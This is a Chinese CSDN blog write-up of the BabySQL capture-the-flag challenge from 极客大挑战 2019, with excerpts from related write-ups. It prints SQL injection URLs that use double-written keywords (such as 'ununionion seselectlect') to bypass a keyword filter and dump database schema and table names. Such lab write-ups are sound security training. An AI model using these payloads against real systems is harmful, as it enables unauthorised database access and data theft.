[极客大挑战 2019]BabySQL1

最新推荐文章于 2024-08-17 17:39:29 发布
最新推荐文章于 2024-08-17 17:39:29 发布
阅读量486 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/evil_ming/article/details/124213171
版权

SQL注入 信息泄露 数据库爆破 绕过过滤 网络安全
关键词由CSDN通过智能技术生成

baby喔应该很简单吧,打开靶机、

尝试下admin

报错说明可以sql注入(虽然但是应该一般都可以的说)

常规注入

/check.php?username=admin&password=1' union select 1#

还是报错,可能是过滤了union和select,尝试了下双写绕过,还是报错,然后尝试%23编写

/check.php?username=admin&password=1' ununionion seselectlect 1,2,3%23

回显2和3。

爆数据库看看

/check.php?username=admin&password=1' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23

 

聪明人都知道先去看看ctf这个表吧,

/check.php?username=admin&password=1' ununionion seselectlect 1,2, group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23

爆一下表

讷讷讷

爆数据

over.

evil_ming
关注
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 440
BUUCTF的[极客挑战 2019]BabySQL 1
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6210
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
[极客挑战 2019]BabySQL1 详解以及思路(sql报错语句探究和跨库查询)
最新发布
2301_78981190的博客
08-17 229
观察报错信息,发现sql的报错信息有点不一样,确定它已经带入查询了,但报错信息中的or被吞了,所以怀疑是把or给过滤掉了,尝试双写后成功绕过(所以以下sql语句中如果语句报错就尝试双写解决,经过后面测试,过滤掉了or,select,by,union,from,where等)不要执着于错误的库(引以为戒本人在geek库中找了20min,在查询ctf库内容时忘记限定为ctf库导致仍然在geek库中查询,没能找到的悲剧(T▽T) )Flag表里只有flag列,所以跨库查询的语句这么写,成功找到flag。
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1615
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 227
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1498
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[极客挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 1000
[极客挑战 2019]BabySQL1 思路细致讲解
双写绕过 [极客挑战 2019]BabySQL 1
m0_75178803的博客
11-14 514
这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB。这样我们就可以知道数据库用户名为root@localhost,数据库名为geek。尝试登录了一下用户名和密码,发现下面没有flag。而且根据报错内容显示是没有我们注入上去的or的。根据报错显示页面过滤了union和select。页面报错,根据报错显示页面过滤掉了or和by。接下来我们查询geek数据库下的表名信息。1' or '1'='1 页面报错。1 or '1'='1 页面报错。
[GXYCTF2019]BabySQli 1
qq_43618536的博客
07-03 1301
BUUCTF的[GXYCTF2019]BabySQli 1
[极客挑战 2019]BabySQL 1(BUCTF在线评测)
邓霖涛的博客
07-21 553
得到flag{ca17b523-fe92-4451-943d-3f832154b748}注意注入orselectwhereunionfrom等关键字都给过滤了。查询该表信息,注意or给替换的password里面也有or。发现成功了,系统可能就新增了一些sql关键字的过滤。一样的sql注入不行了,感觉or关键字给弄没了。得到id,username,password。发现selectfrom一些关键字没了。得到表名b4bsql,geekuser。打开靶机,一样的sql发现不行了。......
[极客挑战 2019]BabySQL(replace()的简单过滤)
qq_45521281的博客
04-15 527
又是这个页面,一样的网站,就是加了过滤,试一下万能密码登陆: 用户名:1' or 1=1# 密码:123 具体报错如下:只保留了 1=1# ,这就说明被检测到了or,并把or给过滤了 看一看还过滤了什么玩意: 随便输入: 用户名:1' union select 1,2,3# 报错显示只保留了 1,2,3# ,这就说明被检测到了union 和 select,并把他们给过滤了 我们猜测后台的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值